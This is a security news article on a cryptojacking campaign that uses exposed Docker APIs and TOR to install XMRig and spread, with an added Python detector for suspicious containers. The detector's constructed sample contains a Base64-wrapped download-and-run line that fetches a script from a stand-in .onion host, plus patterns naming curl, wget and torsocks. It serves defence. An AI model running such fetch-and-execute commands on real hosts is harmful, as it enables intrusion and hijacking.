New cryptojacking campaign abuses TOR network and exposed Docker APIs


Cybersecurity researchers at Akamai have discovered a new variant of a cryptojacking campaign targeting exposed Docker APIs, building on a previous report by Trend Micro in June 2025.

The attackers use the TOR network for anonymity and exploit Docker daemons whose API is exposed without authentication to install an XMRig cryptocurrency miner. Once in, the campaign also locks other actors out of the exposed Docker API, likely to keep exclusive control of each infected host.

The attack starts by creating a Docker container through the exposed API with access to the host system and running a Base64-encoded payload that downloads a shell script from a TOR hidden service (.onion site). The script modifies the SSH configuration for persistence and installs masscan for scanning and torsocks for routing traffic over TOR.
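A defender-side check for the pattern described above, added here as an example and not taken from the Akamai or Trend Micro reports: it reads `docker inspect` output (the same fields the daemon's container JSON endpoint returns), decodes any Base64 token embedded in a container's command, and flags containers that combine host-level access with a download-and-run bootstrap pointing at a .onion address. The Docker field names are real; every container record, name and payload in the sample is constructed for this example.

```python
"""Flag Docker containers whose configuration matches the bootstrap pattern
described above: host-level access combined with a Base64-encoded command that
pulls a script from a .onion address.

Input is the JSON list returned by `docker inspect <ids>` (the same fields the
daemon's /containers/{id}/json endpoint returns).  The field names used here
(HostConfig.Privileged, HostConfig.Binds, HostConfig.PidMode,
HostConfig.NetworkMode, Config.Cmd, Config.Entrypoint) are real Docker API
fields; every container record, name and payload below is constructed for
this example and not taken from any incident.
"""
import base64
import json
import re

# A .onion hostname: base32 alphabet, 16 chars (historical v2) to 56 chars (v3).
ONION_RE = re.compile(r"\b[a-z2-7]{16,56}\.onion\b", re.IGNORECASE)
# Utilities a download-and-run bootstrap typically relies on.
DOWNLOAD_RE = re.compile(r"\b(curl|wget|torsocks)\b")
# A run of Base64 text long enough to hide a command rather than a short flag.
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Mount sources that hand a container the host's filesystem, secrets or daemon.
SENSITIVE_MOUNTS = ("/", "/etc", "/root", "/proc", "/sys", "/var/run/docker.sock")


def decode_base64_fragments(cmd):
    """Decode every Base64-looking token in a command list to text.

    Tokens that are not valid Base64 or not valid UTF-8 are skipped, so a
    random string or a genuine binary blob does not raise."""
    decoded = []
    for token in B64_RE.findall(" ".join(cmd)):
        try:
            decoded.append(base64.b64decode(token, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
    return decoded


def _under(path, prefix):
    """True if path equals prefix or sits inside it ("/" matches only itself)."""
    path = path.rstrip("/") or "/"
    if prefix == "/":
        return path == "/"
    return path == prefix or path.startswith(prefix + "/")


def host_access_indicators(container):
    """List the ways a container reaches the host according to its HostConfig."""
    hc = container.get("HostConfig") or {}
    found = []
    if hc.get("Privileged"):
        found.append("privileged")
    if hc.get("PidMode") == "host":
        found.append("pid=host")
    if hc.get("NetworkMode") == "host":
        found.append("network=host")
    for bind in hc.get("Binds") or []:
        src = bind.split(":", 1)[0]
        if any(_under(src, p) for p in SENSITIVE_MOUNTS):
            found.append("bind:" + bind)
    return found


def command_indicators(container):
    """List bootstrap traits in the entrypoint/command, after decoding any
    embedded Base64 so the real payload, not the wrapper, is inspected."""
    cfg = container.get("Config") or {}
    cmd = list(cfg.get("Entrypoint") or []) + list(cfg.get("Cmd") or [])
    decoded = decode_base64_fragments(cmd)
    found = ["base64-encoded payload"] if decoded else []
    visible = " ".join(cmd + decoded)
    if ONION_RE.search(visible):
        found.append("onion address in command")
    if DOWNLOAD_RE.search(visible):
        found.append("download-and-execute in command")
    return found


def suspicious_containers(inspect_json):
    """Return {name: indicators} for containers that both reach the host and
    run a bootstrap-style command.  Requiring both keeps legitimate host-level
    agents (e.g. a metrics exporter with pid=host) out of the result."""
    hits = {}
    for c in json.loads(inspect_json):
        host, command = host_access_indicators(c), command_indicators(c)
        if host and command:
            hits[c["Name"].lstrip("/")] = host + command
    return hits


# --- constructed sample: three `docker inspect` records (not real data) -------
_STAGE2 = "torsocks wget -qO- http://constructedexampleonion.onion/x.sh | sh"
SAMPLE_INSPECT = json.dumps([
    {"Name": "/web", "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
     "Config": {"Cmd": ["nginx", "-g", "daemon off;"]}},
    {"Name": "/node-exporter",
     "HostConfig": {"PidMode": "host", "NetworkMode": "host"},
     "Config": {"Cmd": ["/bin/node_exporter"]}},
    {"Name": "/miner-bootstrap",
     "HostConfig": {"Privileged": True, "PidMode": "host", "Binds": ["/:/host"]},
     "Config": {"Cmd": ["sh", "-c", "echo %s | base64 -d | sh"
                        % base64.b64encode(_STAGE2.encode()).decode()]}},
])

if __name__ == "__main__":
    for name, why in suspicious_containers(SAMPLE_INSPECT).items():
        print(name, "->", ", ".join(why))
```

Run it against `docker inspect $(docker ps -aq)` on a host you suspect. The two-signal rule is deliberate: privileged or pid=host alone is common for legitimate agents, and a Base64 wrapper alone is common in CI images, so the check only fires when a container has both host reach and a download-and-run command. None of this replaces the underlying fix, which is to stop binding the daemon to tcp://0.0.0.0:2375 without TLS client authentication.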

The malware drops a Go-based tool that scans the internet for other hosts exposing the Docker API on TCP port 2375 and attempts to infect them the same way. It also contains checks for port 23 (Telnet) and port 9222 (Chrome's remote debugging protocol), though those code paths are not yet active.

Notably, the malware parses user login sessions, and its code shows signs of having been generated by an AI model, such as emojis used to mark active sessions. Collected data is sent to a TOR endpoint named httpbot/add, which suggests the infected hosts are being enrolled in a botnet that could be used for data theft or DDoS attacks.
